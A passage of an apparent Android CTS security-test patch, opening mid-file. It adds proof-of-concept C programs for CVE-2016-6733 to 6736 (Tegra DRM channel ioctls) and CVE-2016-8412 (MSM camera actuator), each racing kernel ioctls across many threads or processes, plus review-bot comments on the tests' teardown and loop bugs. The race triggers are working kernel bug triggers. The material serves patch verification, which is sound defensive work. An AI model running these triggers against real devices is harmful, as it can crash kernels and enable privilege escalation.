+struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* child(void* no_use)
+{
+ int ret = 1;
+ set_affinity(1);
+
+ while(ret){
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = THREAD_NUM, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ printf("[+] open failed %d %s\n", errno, strerror(errno));
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child, NULL);
+ }
+
+ while(try_time--){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ /* close */
+ close_c.context = open_c.context;
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ if(ret){
+ }else{
+ open_c.context = 0UL;
+ }
+ }
+
+out_thread:
+ /* kill thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ if(!thread_ret[i]){
+ pthread_kill(thread_id[i], SIGKILL);
+ }
+ }
+
+out_close:
+ close(fd);
+ return 0;
+}
+
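Review bot: `pthread_kill(thread_id[i], SIGKILL)` in the cleanup loop at the end of `main` does not stop a single thread; SIGKILL always acts on the whole process, so the first call terminates the test binary. The process then exits by signal instead of reaching `close(fd)` and `return 0`, which makes a run that completed hard to tell apart from one that was killed from outside. A stop flag that `child` checks in its loop, followed by `pthread_join`, gives an orderly exit. The poc.c files for CVE-2016-6734, CVE-2016-6735 and CVE-2016-6736 use the same teardown; their worker loops are `while(1)` and would need the same flag.

```c
static volatile int stop_threads = 0;

/* … unchanged: set_affinity, prepare, start of child … */
    while(ret && !stop_threads){
/* … unchanged: rest of child, main up to the end of the try_time loop … */

    /* stop and reap the workers instead of signalling them */
    stop_threads = 1;
    for(i = 0; i < THREAD_NUM; i++){
        if(!thread_ret[i]){
            pthread_join(thread_id[i], NULL);
        }
    }
```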
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk
new file mode 100644
index 0000000..e1eebbd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6734
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c
new file mode 100644
index 0000000..60b3a3c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c
@@ -0,0 +1,161 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define KEEPON_THREAD_NUM 900
+#define TRY_TIMES KEEPON_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_START_KEEPON 0x10
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_keepon {
+ volatile __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_START_KEEPON DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_START_KEEPON, struct drm_tegra_keepon)
+
+int fd;
+pthread_t keepon_thread_id[KEEPON_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_keepon keepon_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* keepon_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_START_KEEPON, &keepon_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ ret = pthread_create(keepon_thread_id + i, NULL, keepon_thread, NULL);
+ if(ret){
+ goto out_keepon_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set keepon */
+ keepon_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_keepon_thread:
+ /* kill keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ pthread_kill(keepon_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
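Review bot: The `while(try_time)` loop in `main` decrements `try_time` only when `DRM_IOCTL_TEGRA_OPEN_CHANNEL` returns 0, so on a device where the node opens but that ioctl keeps failing the test never terminates and has to be killed by the harness. Counting attempts rather than successes bounds the run: `while(try_time--){` with the inner `try_time--;` removed, which is how the CVE-2016-6733 poc in this change is written. The same loop appears in the CVE-2016-6735 and CVE-2016-6736 poc.c files.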
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk
new file mode 100644
index 0000000..8935cd6
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6735
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c
new file mode 100644
index 0000000..f38f411
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c
@@ -0,0 +1,160 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define KEEPON_THREAD_NUM 900
+#define TRY_TIMES KEEPON_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_STOP_KEEPON 0x11
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_keepon {
+ volatile __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_STOP_KEEPON DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_STOP_KEEPON, struct drm_tegra_keepon)
+
+int fd;
+pthread_t keepon_thread_id[KEEPON_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_keepon keepon_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* keepon_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_STOP_KEEPON, &keepon_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ ret = pthread_create(keepon_thread_id + i, NULL, keepon_thread, NULL);
+ if(ret){
+ goto out_keepon_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set keepon */
+ keepon_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_keepon_thread:
+ /* kill keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ pthread_kill(keepon_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
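Review bot: When `pthread_create` fails part-way through the creation loop, `goto out_keepon_thread` runs the cleanup loop over all `KEEPON_THREAD_NUM` slots, so `pthread_kill` is called on zero-initialised `pthread_t` values that never named a thread. Passing an invalid thread id to `pthread_kill` is undefined and may abort inside libc. Remember how many threads were started, e.g. `int created = 0;` incremented after each successful create, and clean up with `for(i = 0; i < created; i++)`. The CVE-2016-6734 and CVE-2016-6736 poc.c files share this path; the CVE-2016-6733 version avoids it by recording each `pthread_create` result in `thread_ret`.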
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk
new file mode 100644
index 0000000..fd7fc21
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6736
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c
new file mode 100644
index 0000000..77f4b7a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c
@@ -0,0 +1,174 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define SUBMIT_THREAD_NUM 900
+#define TRY_TIMES SUBMIT_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+
+int fd;
+pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_submit submit_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* submit_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create submit thread */
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ ret = pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
+ if(ret){
+ goto out_submit_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set submit */
+ submit_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_submit_thread:
+ /* kill submit thread */
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_kill(submit_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
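Review bot: `DRM_IOCTL_TEGRA_CLOSE_CHANNEL` is built with `struct drm_tegra_open_channel`, so the request number encodes a 16-byte argument, while `main` passes `&close_c`, an 8-byte `struct drm_tegra_close_channel`. If the kernel copies the encoded size in and out, as `_IOWR` implies, it reads and writes 8 bytes past `close_c` in the test process, which can clobber whichever global the linker placed next to it. Presumably the macro has to stay as it is to match the driver's request number; in that case give the call storage of the encoded size, for example a union of the two structs so that `context` stays at offset 0, and say so in a comment such as `/* request number encodes sizeof(struct drm_tegra_open_channel); argument must be that large */`. The CVE-2016-6733, CVE-2016-6734 and CVE-2016-6735 poc.c files and local_pwn.h carry the same definition.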
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
new file mode 100644
index 0000000..bba13f3
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8412
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
new file mode 100644
index 0000000..d438b40
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <signal.h>
+
+#define VIDIOC_MSM_ACTUATOR_CFG 0xc0d056c6
+#define MSM_SD_SHUTDOWN 0xc00856dd
+
+int fd;
+
+
+int main() {
+ long i;
+ int pid;
+ pthread_t th[6];
+ int argn[50] = {0};
+
+ fd = open("/dev/v4l-subdev7", 0x0ul );
+
+
+ argn[0] = 7;
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+
+ pid = fork();
+ if(!pid){
+ argn[0] = 1;
+ while(1){
+ usleep(10);
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+ }
+ }
+ i = 0;
+ while(1){
+ i++;
+ argn[0] = 7;
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+
+ usleep(100);
+
+ argn[0] = 0;
+ syscall(__NR_ioctl, fd, MSM_SD_SHUTDOWN, argn, 0, 0, 0);
+
+ }
+
+ close(fd);
+
+ return 0;
+}
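Review bot: The parent's `while(1)` in `main` has no exit, so `close(fd)` and `return 0` are unreachable and the test ends only when the harness kills it; the forked child also loops forever and is never signalled or reaped, so it can outlive the parent. The result of `open("/dev/v4l-subdev7", ...)` is not checked either, so on a device without that node both loops spin on an invalid descriptor. I would add `if(fd == -1) return 0;` after the open, bound the parent loop with a fixed iteration count, and finish with `if(pid > 0){ kill(pid, SIGKILL); waitpid(pid, NULL, 0); }`, which needs `<sys/wait.h>`. `th` and the `<pthread.h>` include are unused, and `i` is incremented but never read.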
